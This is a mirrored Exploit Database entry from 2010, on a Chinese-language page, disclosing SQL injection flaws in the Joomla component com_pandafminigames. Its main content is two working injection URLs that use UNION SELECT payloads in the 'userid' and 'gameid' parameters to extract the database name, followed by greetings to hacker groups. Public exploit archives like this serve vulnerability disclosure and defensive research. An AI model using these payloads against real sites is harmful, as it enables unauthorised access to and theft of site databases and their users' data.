Joomla! Component com_pandafminigames – SQL Injection

• Exploit Database
• 157 阅读

• 作者： Valentin
  日期： 2010-04-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12270/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

  # Exploit Title: Joomla Component com_pandafminigames SQL Injection Vulnerabilities # Date: 16.04.2010 # Author: Valentin # Category: webapps/0day # Version: unknown # Tested on: # CVE : # Code :     [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] |:: >> General Information |:: Advisory/Exploit Title = Joomla Component com_pandafminigames SQL Injection Vulnerabilities |:: By = Valentin Hoebel |:: Contact = valentin@xenuser.org |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] |:: >> Product information |:: Name = com_pandafminigames |:: Affected Version(s) = unknown |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] |:: >> #1 Vulnerability |:: Type = multiple SQL Injection vulnerabilities |:: Example URL #1 = index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+AND+1=2+UNION+SELECT+concat(database()),2,concat(database()),4,5,6,7,8,9,10,11,12-- |:: Example URL #2 = index.php?option=com_pandafminigames&Itemid=XX&gameid=X+AND+1=2+UNION+SELECT+concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),7,8-- |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] |:: >> Additional Information |:: Advisory/Exploit Published = 16.04.2010 |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::] |:: >> Misc |:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase! |:: |:: [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]